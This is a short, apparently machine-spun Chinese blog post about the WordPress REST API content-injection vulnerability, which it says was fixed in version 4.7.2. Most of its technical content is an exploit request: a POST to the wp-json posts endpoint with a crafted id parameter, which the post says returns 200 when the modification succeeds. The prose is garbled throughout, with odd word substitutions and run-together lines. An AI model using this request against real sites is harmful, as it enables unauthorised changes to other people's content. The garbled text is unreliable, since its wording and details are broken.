文章目录
[+]
可是本日的彷佛有点不一样。。
额,请升级wordpress
其脸书
(图片来自网络侵删)
缘故原由剖析
此漏洞是昨天爆出的
REST API权限掌握失落效致内容注入
没想到本日就被用上了
漏洞PoCPOST /index.php/wp-json/wp/v2/posts/500?id=500a HTTP/1.1Host: xXXxx.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36Content-Type: application/jsonContent-Length: 43
返回 200 修正成功
修复方案升级到 4.7.2
